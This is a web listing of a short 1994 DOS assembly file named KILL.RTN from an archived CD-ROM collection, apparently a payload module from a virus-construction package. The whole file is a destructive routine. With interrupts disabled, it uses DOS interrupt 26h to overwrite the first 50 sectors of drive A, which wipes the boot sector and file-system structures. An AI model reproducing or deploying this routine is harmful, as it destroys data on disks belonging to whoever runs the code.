home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / LAVIUPD3.ZIP / LAVI13.ZIP / KILL.RTN < prev    next >
Encoding:
Text File  |  1994-01-05  |  472 b   |  15 lines

  1. ;  Sobreescribe un disco
  2. ; drive: 0=A, 1=B, etc...
  3. ; sectores: numero de sectores a escribir
  4.  
  5. drive equ 0
  6. sectores equ 50
  7.  
  8.         mov al,drive
  9.         mov cx,sectores
  10.         cli                             ; Disable interrupts (no Ctrl-C)
  11.         cwd                             ; Clear DX (start with sector 0)
  12.         int     026h                    ; DOS absolute write interrupt
  13.         sti                             ; Restore interrupts
  14.         ret
  15.